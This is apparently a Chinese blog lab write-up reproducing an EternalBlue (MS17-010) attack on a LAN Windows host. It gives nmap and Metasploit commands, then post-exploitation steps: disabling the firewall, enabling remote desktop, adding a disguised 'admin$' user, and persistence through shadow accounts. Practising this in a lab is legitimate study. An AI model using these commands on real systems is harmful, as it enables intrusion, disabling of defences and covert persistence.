永恒之蓝实验
永恒之蓝实验
我们通过永恒之蓝漏洞的利用来复现一下到提权和权限维持的windows渗透思路
信息搜集
首先扫描局域网内存活主机
1 | nmap 192.168.0.* |
之后使用nmap扫描132主机
1 | nmap 192.168.0.132 |
发现目标开启了445端口,可以利用永恒之蓝,进入msfconsole
1 | msfconsole |
漏洞利用
扫描msf17-010
1 | search ms17-010 |
我们使用第一个,然后查看配置
1 | use 0 |
设置目标IP和payload
1 | set rhost 192.168.0.132 |
提权
成功,进入shell并修改编码
1 | getuid #获取system权限 |
关闭防火墙
1 | **netsh advfirewall set currentprofile state off |
开启3389
1 | wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 |
查看端口 netstat -an
,开启成功
创建用户,并给用户赋予管理员权限
1 | net user admin$ Test123 /add |
远程桌面连接,成功
权限维持
可以结合之前的影子账户,完成后续的操作
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Don_Joshua's Blog!